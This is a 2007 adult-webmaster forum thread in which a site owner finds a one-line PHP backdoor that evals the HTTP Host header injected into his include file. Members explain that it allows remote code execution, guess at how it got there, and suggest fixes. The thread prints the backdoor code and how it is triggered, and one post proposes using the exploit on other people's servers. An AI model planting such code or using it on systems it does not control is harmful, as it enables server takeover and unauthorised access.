Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 07-07-2007, 02:51 AM   #1
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Found this code on my site after I signed it up with CCBILL ..

$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is?
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:18 AM   #2
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
bump...

Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here..
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:32 AM   #3
hand-held
Confirmed User
 
Join Date: Sep 2006
Location: WA
Posts: 136
In the parlance of our times... j00 g0t 0wn3d.
__________________
Pimp pimp... hooray! Pimp pimp... hooray!
hand-held is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:41 AM   #4
2012
So Fucking What
 
2012's Avatar
 
Industry Role:
Join Date: Jul 2006
Posts: 17,189
at least you got a reach around

Quote:
Originally Posted by biskoppen View Post
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is?
the code basically says "yes, I have a domain" then makes sure its a good one before fucking you and exiting and not finishing anything else ...

whats the rest of your code ?
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

Last edited by 2012; 07-07-2007 at 04:42 AM.. Reason: bye zzzzzzz
2012 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:51 AM   #5
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by fartfly View Post
the code basically says "yes, I have a domain" then makes sure its a good one before fucking you and exiting and not finishing anything else ...

whats the rest of your code ?
That was all there was inserted... I think.. I go through it all a little closely
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:53 AM   #6
bl4h
Confirmed User
 
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
hmm doesnt make sense to me. how does eval "make sure its good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|
bl4h is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:04 AM   #7
2012
So Fucking What
 
2012's Avatar
 
Industry Role:
Join Date: Jul 2006
Posts: 17,189
Quote:
Originally Posted by bl4h View Post
the exit pretty much makes the whole thing a waste of time anyway.
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

Last edited by 2012; 07-07-2007 at 05:07 AM..
2012 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:08 AM   #8
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:09 AM   #9
2012
So Fucking What
 
2012's Avatar
 
Industry Role:
Join Date: Jul 2006
Posts: 17,189
... lots of ways
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself

Last edited by 2012; 07-07-2007 at 05:12 AM..
2012 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:33 AM   #10
Tempest
Too lazy to set a custom title
 
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
If what I think is true, that will allow someone to run any php code on your site that they want.
Tempest is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:34 AM   #11
sweetpurple04
Confirmed User
 
Join Date: Jan 2007
Posts: 425
seems like a conspiracy
__________________
sweetpurple04 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:37 AM   #12
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by Tempest View Post
If what I think is true, that will allow someone to run any php code on your site that they want.
Yes ofcourse.. the eval with do that... hmmm... this looks more and more like an "evil" trespassing...
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 06:36 AM   #13
quantum-x
Confirmed User
 
quantum-x's Avatar
 
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.
quantum-x is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 06:37 AM   #14
bl4h
Confirmed User
 
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
Quote:
Originally Posted by Tempest View Post
If what I think is true, that will allow someone to run any php code on your site that they want.
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !

Last edited by bl4h; 07-07-2007 at 06:39 AM..
bl4h is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 06:55 AM   #15
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by bl4h View Post
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !
Ok, I get the whole picture now... isn't that just great
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 08:40 AM   #16
swampthing
Confirmed User
 
Join Date: Mar 2007
Posts: 570
your not the first person
swampthing is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 10:24 AM   #17
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
is it in the very top or very bottom ?
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 10:35 AM   #18
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
two of my clients reported the same thing.

It seems to be part of a botnet/Ddos tool.

What i read is, that code can be send to that host, and ask the host to exechute a remote script
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 10:42 AM   #19
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
Quote:
Originally Posted by KimJI View Post
two of my clients reported the same thing.

It seems to be part of a botnet/Ddos tool.

What i read is, that code can be send to that host, and ask the host to exechute a remote script
yup , its used by seo spammers to include pages on your server that dont exist.. or a botnet

when was it modified..?

and try going to google and type site:yourdomain.com and see if there are any new pages indexed you dont recognize
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 10:44 AM   #20
Miguel T
♦ Web Developer ♦
 
Miguel T's Avatar
 
Industry Role:
Join Date: May 2005
Location: Full-Stack Developer
Posts: 12,472
How the hell can that be placed in EACH ones pages?
__________________

Full Stack Webdeveloper: HTML5/CSS3, jQuery, AJAX, ElevatedX, NATS, MechBunny, Wordpress
Miguel T is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 11:12 AM   #21
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
Quote:
Originally Posted by AbsolutePorn View Post
How the hell can that be placed in EACH ones pages?

because the server was compromised
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 11:47 AM   #22
digifan
The Profiler
 
digifan's Avatar
 
Industry Role:
Join Date: Oct 2002
Location: ICQ 76281726 and I'm female
Posts: 14,618
Uh-oh, not fun for sure...
__________________
[email protected]
Webair Rocks
digifan is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 11:55 AM   #23
ladida
Confirmed User
 
ladida's Avatar
 
Join Date: Nov 2005
Posts: 2,171
Quote:
Originally Posted by quantum-x View Post
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.
You're wrong. This will work regardless off register globals. If he found that on his server, he's fucked, as that gives full server access.
__________________
agentGFY *at* gmail.com
ladida is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 12:16 PM   #24
just a punk
So fuckin' bored
 
just a punk's Avatar
 
Industry Role:
Join Date: Jun 2003
Posts: 32,391
As I said in other thread it's a way to do php code injection.
__________________
Obey the Cowgod
just a punk is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 12:20 PM   #25
just a punk
So fuckin' bored
 
just a punk's Avatar
 
Industry Role:
Join Date: Jun 2003
Posts: 32,391
Quote:
Originally Posted by quantum-x View Post
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.

It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with.
You're wrong. Read this: http://ez.no/layout/set/printarticle...f_csrf_and_xss
__________________
Obey the Cowgod
just a punk is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 12:24 PM   #26
ladida
Confirmed User
 
ladida's Avatar
 
Join Date: Nov 2005
Posts: 2,171
Quote:
Originally Posted by cyberxxx View Post
They can do alot more then that aswell.
__________________
agentGFY *at* gmail.com
ladida is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 12:50 PM   #27
bl4h
Confirmed User
 
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes
bl4h is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 01:04 PM   #28
ladida
Confirmed User
 
ladida's Avatar
 
Join Date: Nov 2005
Posts: 2,171
Quote:
Originally Posted by bl4h View Post
you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes
Lol, ok, no jokes.
__________________
agentGFY *at* gmail.com
ladida is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 02:21 PM   #29
CCBillMatthewP
Registered User
 
Join Date: Dec 2006
Posts: 22
biskoppen,

This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.
__________________

Matthew
Client Support Lead
[email protected]
United States 1-800-510-2859
International 1-888-596-9279
CCBillMatthewP is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 02:46 PM   #30
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by CCBillMatthewP View Post
biskoppen,

This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.
Matthew, any chance you could contact me via ICQ to discuss this?

My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so)

ICQ : 30898463
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 02:53 PM   #31
CCBillMatthewP
Registered User
 
Join Date: Dec 2006
Posts: 22
biskoppen,

Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig.
__________________

Matthew
Client Support Lead
[email protected]
United States 1-800-510-2859
International 1-888-596-9279
CCBillMatthewP is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:00 PM   #32
potter
Confirmed User
 
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.
__________________

potter is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:02 PM   #33
TheSenator
Too lazy to set a custom title
 
TheSenator's Avatar
 
Industry Role:
Join Date: Feb 2003
Location: NJ
Posts: 13,340
so... what is the status of this?

Damn CCBill doesn't have access to ICQ! Come on guys!
__________________
ISeekGirls.com since 2005
TheSenator is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:08 PM   #34
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
Quote:
Originally Posted by potter View Post
Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.

There are other sites and server compromised, Its not only "biskoppen"
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:13 PM   #35
d-null
. . .
 
d-null's Avatar
 
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
I was going to sign up for ccbill soon too.................. watching to see how this develops


and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available.

this really made a lasting impression on me
d-null is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:17 PM   #36
Pornopat
AdultTubeSubmits.com
 
Industry Role:
Join Date: Dec 2003
Location: The Netherlands
Posts: 10,598
Pretty sure its not ccbill.
Pornopat is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:23 PM   #37
Zoose
Confirmed User
 
Join Date: Aug 2006
Posts: 268
Quote:
Originally Posted by jetjet View Post
I was going to sign up for ccbill soon too.................. watching to see how this develops


and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available.

this really made a lasting impression on me
The chances this has anything to do with CCBill or anyone at CCBill are basically nil. Either his entire server was compromised, his ftp account with his host was compromised, or possibly a script he runs is vulnerable.
Zoose is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:26 PM   #38
d-null
. . .
 
d-null's Avatar
 
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
that makes the most sense
d-null is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 03:28 PM   #39
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
I dont get why its not trackable throught the logfiles who did this? have you disabled logging?
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:05 PM   #40
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by KimJI View Post
I dont get why its not trackable throught the logfiles who did this? have you disabled logging?
I was told that my logs is truncated every x hours when the stats is run
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:06 PM   #41
Tempest
Too lazy to set a custom title
 
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
Quote:
Originally Posted by bl4h View Post
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !
Exactly...

That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had went to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like norton etc. didn't catch it. He was saying you needed something better like Kapersky.

These guys got his server login info and intalled the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re upload them. Happens very fast. It could be that this is another "version" of that.
Tempest is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:15 PM   #42
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
Emagine how much traffic they can steal this way? just a few clicks from each sites can be millions in a few days
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:23 PM   #43
d-null
. . .
 
d-null's Avatar
 
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work
d-null is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:28 PM   #44
KimJI
Confirmed User
 
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
Quote:
Originally Posted by jetjet View Post
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work

most serious people have.
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org
KimJI is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:31 PM   #45
Violetta
Affiliate
 
Violetta's Avatar
 
Join Date: Jul 2004
Posts: 28,735
time to change your ftp password
__________________
M&A Queen
Violetta is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:32 PM   #46
biskoppen
Confirmed User
 
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
Quote:
Originally Posted by Rockatansky View Post
time to change your ftp password
Been there, done that
__________________
Submit my videos to make bank, tons of 5 minute videos offered right here
biskoppen is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 04:37 PM   #47
Tempest
Too lazy to set a custom title
 
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
Quote:
Originally Posted by biskoppen View Post
Been there, done that
Scan your computer with Kapersky and Panda (or any other "better" virus programs) maybe first... if you have a keylogger on your system, they'll just get the new password anyway.
Tempest is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:06 PM   #48
RawAlex
So Fucking Banned
 
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
Here are some potential sources of infection:

1 - your own PC could be infected, anything from a keylogger to a total owning of your PC.

2 - Someone at CCBill could also have a computer with similar ownage.

3 - Your server maybe have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar.


Basically, sounds like you got owned pretty majorly. start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to looks for holes, including cron tasks, open files, extra users, odd logins, etc.

Good luck.
RawAlex is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-07-2007, 05:18 PM   #49
bu((aneer
Confirmed User
 
Join Date: Nov 2004
Posts: 651
Quote:
Originally Posted by biskoppen View Post
Matthew, any chance you could contact me via ICQ to discuss this?

My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so)

ICQ : 30898463



FTP passwords are sent via plain/clear text. Very easy to pick them off the wire!
bu((aneer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 07-08-2007, 11:40 AM   #50
milambur
Mainstream since 2010
 
milambur's Avatar
 
Industry Role:
Join Date: Jan 2003
Posts: 1,327
Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?
__________________
Alea iacta est

Last edited by milambur; 07-08-2007 at 11:42 AM..
milambur is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.